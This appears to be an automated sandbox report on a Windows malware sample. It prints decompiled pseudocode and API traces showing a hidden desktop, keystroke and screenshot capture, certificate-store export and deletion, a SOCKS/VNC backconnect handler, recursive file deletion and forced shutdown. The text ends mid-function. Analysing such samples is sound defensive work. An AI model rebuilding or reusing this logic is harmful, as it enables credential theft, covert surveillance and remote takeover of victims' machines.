    C-Code - Quality: 100%
    			E0040EF1F(void* __ecx, void* __eflags, WCHAR* _a4) {
    				char _v5;
    				struct HWINSTA__* _v12;
    				struct HWINSTA__* _v16;
    				char _v32;
    				char _v48;
    				void* __esi;
    				struct HWINSTA__* _t23;
    				WCHAR* _t28;
    				int _t35;
    				struct HWINSTA__* _t41;
    				void* _t43;
    				WCHAR* _t45;
    				struct HDESK__* _t46;
    
    				_t43 = __ecx;
    				_t45 =  &_v32;
    				_v5 = 0;
    				E00405B00(0xcc, _t45);
    				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
    				_v12 = _t23;
    				if(_t23 != 0) {
    					L2:
    					_v16 = GetProcessWindowStation();
    					if(E0040EEF7(_t50, _v12) == 0) {
    						L13:
    						CloseWindowStation(_v12);
    						L14:
    						return _v5;
    					}
    					_t28 = _a4;
    					_a4 = _t28;
    					if(_t28 == 0) {
    						_t37 =  &_v48;
    						_a4 =  &_v48;
    						E00405B00(0xcd, _t37);
    					}
    					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
    					if(_t46 != 0) {
    						L7:
    						if(E0040EEB2(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
    							L9:
    							_v5 = 1;
    							L10:
    							CloseDesktop(_t46);
    							if(_v5 != 0) {
    								goto L13;
    							}
    							goto L11;
    						}
    						_t35 = SetThreadDesktop(_t46);
    						_v5 = 0;
    						if(_t35 == 0) {
    							goto L10;
    						}
    						goto L9;
    					} else {
    						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
    						_t54 = _t46;
    						if(_t46 == 0) {
    							L11:
    							_t58 = _v16;
    							if(_v16 != 0) {
    								E0040EEF7(_t58, _v16);
    							}
    							goto L13;
    						}
    						goto L7;
    					}
    				}
    				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
    				_v12 = _t41;
    				_t50 = _t41;
    				if(_t41 == 0) {
    					goto L14;
    				}
    				goto L2;
    			}
[Address column for this function (0x0040ef1f to 0x0040f016, one offset per decompiled line) spilled out of the interactive view and is omitted here.]

    APIs
    • OpenWindowStationW.USER32 ref: 0040EF44
    • CreateWindowStationW.USER32 ref: 0040EF57
    • GetProcessWindowStation.USER32 ref: 0040EF68
    • OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040EFA3
    • CreateDesktopW.USER32 ref: 0040EFB7
    • GetCurrentThreadId.KERNEL32 ref: 0040EFC3
    • GetThreadDesktop.USER32(00000000), ref: 0040EFCA
    • SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040EFDC
    • CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040EFEE
    • CloseWindowStation.USER32(?,?), ref: 0040F009
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
• Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
    • String ID:
    • API String ID: 2917431391-0
    • Opcode ID: 76b4b5615bc98ffe0ae667b5d81979de82f4cdde3273d700411f48d377f69307
    • Instruction ID: 38a931a9904f5a693cfff70754e573348e5c662d2f966472f1e896702e8469e2
    • Opcode Fuzzy Hash: 76b4b5615bc98ffe0ae667b5d81979de82f4cdde3273d700411f48d377f69307
    • Instruction Fuzzy Hash: C1215E75800259BFDF206FB69D88A9F7EB8EB48385F00447AF901B3261D6398D55CA68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00405CE7(MSG* _a4) {
    				char _v524;
    				char _v780;
    				char _v840;
    				char _v864;
    				short _v884;
    				intOrPtr* _v888;
    				intOrPtr _v900;
    				void* __edi;
    				void* __esi;
    				int _t25;
    				signed int _t27;
    				signed int _t32;
    				void* _t36;
    				intOrPtr _t39;
    				WCHAR* _t45;
    				MSG* _t54;
    				WCHAR* _t65;
    				intOrPtr* _t66;
    				signed int _t67;
    				void* _t69;
    
    				_t69 = (_t67 & 0xfffffff8) - 0x374;
    				_t54 = _a4;
    				if(_t54 == 0 || E00412FEE() == 0) {
    					L20:
    					return TranslateMessage(_t54);
    				} else {
    					_t25 = _t54->message;
    					if(_t25 != 0x201) {
    						__eflags = _t25 - 0x100;
    						if(_t25 != 0x100) {
    							goto L20;
    						}
    						__eflags = _t54->wParam - 0x1b;
    						if(_t54->wParam == 0x1b) {
    							goto L20;
    						}
    						_t27 = GetKeyboardState( &_v780);
    						__eflags = _t27;
    						if(_t27 == 0) {
    							goto L20;
    						}
    						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
    						__eflags = _t32;
    						if(_t32 <= 0) {
    							goto L20;
    						}
    						__eflags = _t32 - 1;
    						if(__eflags != 0) {
    							if(__eflags > 0) {
    								L18:
    								__eflags = 0;
    								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
    								_push( &_v884);
    								L19:
    								E00405B4A();
    								goto L20;
    							}
    							L17:
    							__eflags = _v884 - 0x20;
    							if(_v884 < 0x20) {
    								goto L20;
    							}
    							goto L18;
    						}
    						__eflags = _t54->wParam - 8;
    						if(_t54->wParam != 8) {
    							goto L17;
    						}
    						_push(0x404248);
    						goto L19;
    					}
    					EnterCriticalSection(0x4223b8);
    					if( *0x4223b0 > 0) {
    						 *0x4223b0 =  *0x4223b0 + 0xffff;
    						_t36 = 2;
    						E00405B00(_t36,  &_v864);
    						_t39 = E00411FB9( &_v864, 0x1e, 0x1f4);
    						_v900 = _t39;
    						if(_t39 != 0) {
    							E00405B00(0,  &_v840);
    							_t65 =  &_v884;
    							E00405B00(1, _t65);
    							_t45 =  *0x4223a8; // 0x0
    							if(_t45 != 0) {
    								_t65 = _t45;
    							}
    							E00407B78( &_v840, 0x104,  &_v524,  &_v840);
    							_t66 = _v888;
    							E0040ECC5(0x104, _t66,  &_v524);
    							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x423bd8, GetTickCount());
    						}
    					}
    					LeaveCriticalSection(0x4223b8);
    					goto L20;
    				}
    			}

    APIs
    • TranslateMessage.USER32(?), ref: 00405E3E
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • EnterCriticalSection.KERNEL32(004223B8), ref: 00405D21
    • LeaveCriticalSection.KERNEL32(004223B8), ref: 00405DC4
      • Part of subcall function 00411FB9: LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 00411FEB
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 00411FFC
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00412009
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 00412016
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 00412023
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 00412030
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041203D
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041204A
      • Part of subcall function 00411FB9: LoadLibraryA.KERNEL32(ole32.dll), ref: 00412092
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041209D
      • Part of subcall function 00411FB9: LoadLibraryA.KERNEL32(gdi32.dll), ref: 004120AF
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 004120BA
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 004120C6
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 004120D3
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 004120E0
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 004120ED
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 004120FA
      • Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00412107
    • GetTickCount.KERNEL32 ref: 00405D86
    • GetKeyboardState.USER32(?), ref: 00405DDE
    • ToUnicode.USER32 ref: 00405E06
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
    • String ID:
    • API String ID: 2762424063-3916222277
    • Opcode ID: 752a60756699002f5b94db22db133baa0c21dcca33543787eb6313ad9f2c6abc
    • Instruction ID: 9a1ec78b23e704eb9fb787ac47d41529a85131465b20d14d8f4831bdc132c496
    • Opcode Fuzzy Hash: 752a60756699002f5b94db22db133baa0c21dcca33543787eb6313ad9f2c6abc
    • Instruction Fuzzy Hash: 8231E032604701ABDB20AF64DD49A9B77A8EF40740F44483BF994F71E1E778E944CB99
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,00404B44), ref: 0041A59C
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0041A5B8
    • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0041A5C4
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0041A603
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0041A633
    • CharLowerW.USER32(?,?,00000000,00000001), ref: 0041A651
    • GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0041A65C
    • CertCloseStore.CRYPT32(?,00000000), ref: 0041A6E5
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
    • String ID:
    • API String ID: 3751268071-0
    • Opcode ID: 7bb4a91820d45a5ae99b46ada0331db0186f60ecfae6e02f09e686a6b80ee7ce
    • Instruction ID: 1e1061c97c321da34795b7c3d7611dc820124baefcd28a89a87f2d014ebcd163
    • Opcode Fuzzy Hash: 7bb4a91820d45a5ae99b46ada0331db0186f60ecfae6e02f09e686a6b80ee7ce
    • Instruction Fuzzy Hash: 0741C5B1208345ABD710DF65CD40AAFBBECAB88354F04093FBAC4E21A0D638D955C767
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0040C5AE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
    				short _v524;
    				struct _WIN32_FIND_DATAW _v1116;
    				intOrPtr _v1120;
    				intOrPtr _v1124;
    				void* _v1128;
    				int _t51;
    				signed int _t60;
    				long _t68;
    				signed char _t71;
    				signed int _t83;
    
    				_v1120 = __edx;
    				_v1124 = __ecx;
    				_t51 = E0040C70A("*",  &_v524, __ecx);
    				if(_t51 == 0) {
    					L25:
    					return _t51;
    				}
    				_t51 = FindFirstFileW( &_v524,  &_v1116);
    				_v1128 = _t51;
    				if(_t51 != 0xffffffff) {
    					_t71 = _a8;
    					while(1) {
    						_t83 = 0;
    						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
    							break;
    						}
    						if(E0040C30F( &(_v1116.cFileName)) != 0) {
    							L23:
    							if(FindNextFileW(_v1128,  &_v1116) != 0) {
    								continue;
    							}
    							break;
    						}
    						_t60 = _v1116.dwFileAttributes & 0x00000010;
    						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
    							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
    								goto L17;
    							} else {
    								goto L10;
    							}
    						} else {
    							L10:
    							if(_a4 <= _t83) {
    								L17:
    								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0040C70A( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
    									_t103 = _a24;
    									if(_a24 != 0) {
    										Sleep(_a24);
    									}
    									E0040C5AE( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
    								}
    								goto L23;
    							}
    							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
    								_t83 = _t83 + 1;
    								if(_t83 < _a4) {
    									continue;
    								}
    								goto L17;
    							}
    							_t68 = _a12(_a16);
    							__eflags = _t68;
    							if(_t68 == 0) {
    								break;
    							}
    							__eflags = _a28;
    							if(_a28 != 0) {
    								Sleep(_a28);
    							}
    							goto L17;
    						}
    					}
    					_t51 = FindClose(_v1128);
    				}
    			}

    APIs
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C5ED
    • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040C614
    • PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040C65E
    • Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0040C68B
    • Sleep.KERNEL32(00000000,?,?), ref: 0040C6BB
    • FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040C6E9
    • FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040C6FB
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
    • String ID:
    • API String ID: 2348139788-0
    • Opcode ID: 9a58aaa5927a71cf76b912a259a5c5785ffce04aa8c2e24f505db358aed5e96f
    • Instruction ID: f9bfacc21a6e90477fc1d0ddf403c8ea6318374d0e5d9bd662873fe9a01bf58c
    • Opcode Fuzzy Hash: 9a58aaa5927a71cf76b912a259a5c5785ffce04aa8c2e24f505db358aed5e96f
    • Instruction Fuzzy Hash: E7414D3100420ADBCB21DF54C885A9F7BA5EF54384F104A3AF994A22E1D73AD859DB99
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CryptAcquireContextW.ADVAPI32(0040C751,00000000,00000000,00000001,F0000040,?,0040C751,?,00000030,?,?,?,0040CC6A,00423E80), ref: 00408143
    • CryptCreateHash.ADVAPI32(0040C751,00008003,00000000,00000000,00000030,?,0040C751,?,00000030,?,?,?,0040CC6A,00423E80), ref: 0040815B
    • CryptHashData.ADVAPI32(00000030,00000010,0040C751,00000000,?,0040C751), ref: 00408177
    • CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,0040C751), ref: 0040818F
    • CryptDestroyHash.ADVAPI32(00000030,?,0040C751), ref: 004081A6
    • CryptReleaseContext.ADVAPI32(0040C751,00000000,?,0040C751,?,00000030,?,?,?,0040CC6A,00423E80), ref: 004081B0
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
    • Instruction ID: 88f42cc7b0ca07631ceee7d9af1f09eb1df0b2196e3b319a36da1e3b666e43f9
    • Opcode Fuzzy Hash: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
    • Instruction Fuzzy Hash: FB11277180014CBFEF119B90DE84EEE7B7DEB04344F004465F691B51A1C77A8E959B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0041D132(void* __ecx, CHAR** _a4, signed int _a7) {
    				signed int _v6;
    				signed int _v8;
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				short _v30;
    				intOrPtr _v36;
    				char _v44;
    				char _v304;
    				char _v788;
    				char _v792;
    				void* __edi;
    				void* __esi;
    				int _t68;
    				signed short _t70;
    				signed int _t80;
    				void* _t95;
    				signed int _t99;
    				void* _t102;
    				signed int _t108;
    				void* _t112;
    				CHAR** _t121;
    				signed int _t130;
    				intOrPtr* _t131;
    				intOrPtr* _t138;
    				signed int _t139;
    				void* _t141;
    
    				_t123 = __ecx;
    				E00406F38( &_v304,  &_v304, 0, 0x104);
    				_t121 = _a4;
    				if(lstrcmpiA( *_t121, "socks") != 0) {
    					_t68 = lstrcmpiA( *_t121, "vnc");
    					__eflags = _t68;
    					if(_t68 != 0) {
    						_t70 = E00407504( *_t121, _t123, 0);
    						_t6 = _t70 - 1; // -1
    						_t123 = _t6;
    						__eflags = _t6 - 0xfffd;
    						if(_t6 > 0xfffd) {
    							L32:
    							E0040AF86( &_v304);
    							_a7 = 0;
    							if(_v304 <= 0) {
    								L34:
    								E00406E85( *_t121);
    								E00406E85(_t121[1]);
    								E00406E85(_t121[2]);
    								E0040A658(_t121[3]);
    								E00406E85(_t121);
    								return 0;
    							} else {
    								goto L33;
    							}
    							do {
    								L33:
    								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
    								_a7 = _a7 + 1;
    							} while (_a7 < _v304);
    							goto L34;
    						}
    						_t80 = _t70 & 0x0000ffff;
    						_v24 = _t80;
    						__eflags = _t80;
    						if(_t80 == 0) {
    							goto L32;
    						}
    						L6:
    						_t130 = E00409F0E(E00407504(_t121[2], _t123, 0), _t123, _t121[1]);
    						_v16 = _t130;
    						if(_t130 == 0xffffffff) {
    							goto L32;
    						}
    						E0040A280(_t123, _t130);
    						E0040A23E(_t130);
    						_t89 = E00407CDC(E00413194(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
    						_t144 = _t89;
    						if(_t89 == 0) {
    							L31:
    							E0040A228(_t89, _t130);
    							goto L32;
    						}
    						_v9 = E0040D51D( &_v788, _v36, _t144, _t130, 1, _v44);
    						_t89 = E00407CCA( &_v44);
    						if(_v9 == 0) {
    							goto L31;
    						}
    						_t89 = E0040A135(0,  &_v16, 0, 0);
    						_t130 = _v16;
    						if(_t89 != _t130) {
    							goto L31;
    						}
    						while(1) {
    							_push(0x7530);
    							_push( &_v8);
    							_t95 = 4;
    							if(E00409E38(_t95, _t130) == 0 || _v8 <= 4) {
    								break;
    							}
    							_t138 = E00406E55(_v8 & 0x0000ffff);
    							_push(0x7530);
    							if(_t138 == 0) {
    								_t127 = _v8 & 0x0000ffff;
    								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
    								L29:
    								_push(_t99);
    								_push(_t130);
    								_t89 = E00409E80(_t127);
    								break;
    							}
    							_push(_t138);
    							_t127 = _t130;
    							_t102 = E00409E38((_v8 & 0x0000ffff) - 4, _t130);
    							_push(_t138);
    							if(_t102 == 0) {
    								L35:
    								_t89 = E00406E85();
    								break;
    							}
    							_v30 = _v6;
    							_v28 =  *_t138;
    							E00406E85();
    							if(_v6 != 0) {
    								_t139 = E00406E55(_v6 & 0x0000ffff);
    								_t99 = _v6 & 0x0000ffff;
    								_push(0x7530);
    								__eflags = _t139;
    								if(_t139 == 0) {
    									goto L29;
    								}
    								_push(_t139);
    								_t127 = _t130;
    								_t108 = E00409E38(_t99, _t130);
    								__eflags = _t108;
    								if(_t108 == 0) {
    									_push(_t139);
    									goto L35;
    								}
    								_v20 = _t139;
    								L20:
    								if(_v28 == 2 && _v30 == 4) {
    									_t112 = 0xc;
    									_t131 = E00406E55(_t112);
    									if(_t131 != 0) {
    										 *_t131 = _a4;
    										 *((intOrPtr*)(_t131 + 4)) = _v24;
    										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
    										if(E0040AF41( &_v304, 0x20000, E0041CEA9, _t131) == 0) {
    											E00406E85(_t131);
    										}
    									}
    									E0040AEEF(_t127,  &_v304);
    								}
    								E00406E85(_v20);
    								_t89 = E0040A135(0,  &_v16, 0, 0);
    								_t130 = _v16;
    								if(_t89 == _t130) {
    									continue;
    								} else {
    									break;
    								}
    							}
    							_v20 = _v20 & 0x00000000;
    							goto L20;
    						}
    						_t121 = _a4;
    						goto L31;
    					}
    					_v24 = 0xfffffffe;
    					goto L6;
    				}
    				_v24 = _v24 | 0xffffffff;
    				goto L6;
    			}

    APIs
    • lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0041D161
    • lstrcmpiA.KERNEL32(?,vnc), ref: 0041D174
    • CloseHandle.KERNEL32(?), ref: 0041D391
      • Part of subcall function 0040AF41: SetLastError.KERNEL32(0000009B,004157D2,00000000,00415670,00000000,00423860,00000000,0041348A,00423860,00000000,00000104,74B5F560,00000000), ref: 0040AF4B
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
    • String ID: socks$vnc
    • API String ID: 3305036421-270151703
    • Opcode ID: 5e92c35cfec363aa1da3900839a35e12200f317f3cbf8a054dbfbad91739be44
    • Instruction ID: beb3030c9ad510dead979cb061e80031c99a44befb3141e2b77d97670107d06d
    • Opcode Fuzzy Hash: 5e92c35cfec363aa1da3900839a35e12200f317f3cbf8a054dbfbad91739be44
    • Instruction Fuzzy Hash: CF71BEB1C00218AACF11AB65CC41BEE77B5AF45314F0040ABF964B72C1DB3C9E95C7AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C4F3(WCHAR* __ecx, void* __eflags) {
    				struct _WIN32_FIND_DATAW _v596;
    				short _v1116;
    				WCHAR* _t38;
    				void* _t42;
    
    				_t38 = __ecx;
    				if(E0040C70A("*",  &_v1116, __ecx) == 0) {
    					L9:
    					SetFileAttributesW(_t38, 0x80);
    					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
    				}
    				_t42 = FindFirstFileW( &_v1116,  &_v596);
    				if(_t42 == 0xffffffff) {
    					goto L9;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					if(E0040C30F( &(_v596.cFileName)) == 0 && E0040C70A( &(_v596.cFileName),  &_v1116, _t38) != 0) {
    						_t51 = _v596.dwFileAttributes & 0x00000010;
    						if((_v596.dwFileAttributes & 0x00000010) == 0) {
    							E0040C1E0( &_v1116);
    						} else {
    							E0040C4F3( &_v1116, _t51);
    						}
    					}
    				} while (FindNextFileW(_t42,  &_v596) != 0);
    				FindClose(_t42);
    				goto L9;
    			}

    APIs
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
    • FindFirstFileW.KERNEL32(?,?,?), ref: 0040C524
    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C57F
    • FindClose.KERNEL32(00000000), ref: 0040C58A
    • SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040C596
    • RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040C59D
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
    • String ID:
    • API String ID: 765042924-0
    • Opcode ID: 4471f775d7236a94b67ce94ff3d35b5da8c834d1ca50ed01f3e41d62b2b8e23e
    • Instruction ID: 79ccf997f8c444a502747013864e70c745f6b312d9b0b45bed35ef755577b433
    • Opcode Fuzzy Hash: 4471f775d7236a94b67ce94ff3d35b5da8c834d1ca50ed01f3e41d62b2b8e23e
    • Instruction Fuzzy Hash: 0111B636404214EAC220EB64DC89EEB739CAF99354F004B3FF995F31D0EB78A545866D
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,00404B44), ref: 0041A701
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0041A71A
    • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,004135E0), ref: 0041A725
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0041A72D
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 0041A739
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
    • String ID:
    • API String ID: 1842529175-0
    • Opcode ID: a3f5f687027540a7d2d5dcd9dbc5752aaec325e11dcdfe275ca393edc7ca3d3a
    • Instruction ID: 6f93e5f50c9083a82a274e41587578c1cebc3d9b8f5a279b077bd7a515c21d83
    • Opcode Fuzzy Hash: a3f5f687027540a7d2d5dcd9dbc5752aaec325e11dcdfe275ca393edc7ca3d3a
    • Instruction Fuzzy Hash: BAF0E53228221067C71127656D4CFF7BB7CDB82BA1B140023FA90E32A08E38C891857D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040F429(void* __ebx, void* __ecx) {
    				signed int _v124;
    				signed char _t12;
    
    				_t12 =  *0x423344;
    				if((_t12 & 0x00000010) == 0) {
    					__eflags = _t12 & 0x00000008;
    					if(__eflags != 0) {
    						E004164CE(__ebx, __ecx, __eflags);
    						_t12 =  *0x423344;
    					}
    					__eflags = _t12 & 0x00000003;
    					if((_t12 & 0x00000003) == 0) {
    						__eflags = _t12 & 0x00000004;
    						if((_t12 & 0x00000004) != 0) {
    							goto L8;
    						}
    						goto L9;
    					} else {
    						E00408551(L"SeShutdownPrivilege");
    						__eflags = 0;
    						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x423344 >> 0x00000001 & 0x00000001, 0x80000000);
    						return 0;
    					}
    				} else {
    					_t12 = E004125BA( &_v124);
    					if(_t12 != 0) {
    						_v124 = _v124 | 0x00000020;
    						 *0x423968 =  *0x423968 | 0x00000010;
    						E00412612( &_v124);
    						L8:
    						return ExitWindowsEx(0x14, 0x80000000);
    					}
    					L9:
    					return _t12;
    				}
    			}

    APIs
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 0040F48E
      • Part of subcall function 004125BA: CreateMutexW.KERNEL32(004239A0,00000000,004237F8,?,?,0041426F,?,?,?,743C152E,00000002), ref: 004125E0
    • ExitWindowsEx.USER32(00000014,80000000), ref: 0040F4A1
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateExitInitiateMutexShutdownSystemWindows
    • String ID: $SeShutdownPrivilege
    • API String ID: 3829579691-2253681161
    • Opcode ID: 50ecc8b0190270e3b8b526b839955afac8d8c86643c5ba2af236ba667adaabe1
    • Instruction ID: 5367e53b12ed5d1512b0ad39f4753287695867c3c3ff2b53643d2ba269743ebc
    • Opcode Fuzzy Hash: 50ecc8b0190270e3b8b526b839955afac8d8c86643c5ba2af236ba667adaabe1
    • Instruction Fuzzy Hash: 8AF0A97160430469EF30EBF85D46BEB3B689711749F54043AAE81F25E2CB7C9546CA2D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E0041AC79(void* __edx, intOrPtr _a4) {
    				signed int _v12;
    				int _v16;
    				void* _v20;
    				int _v24;
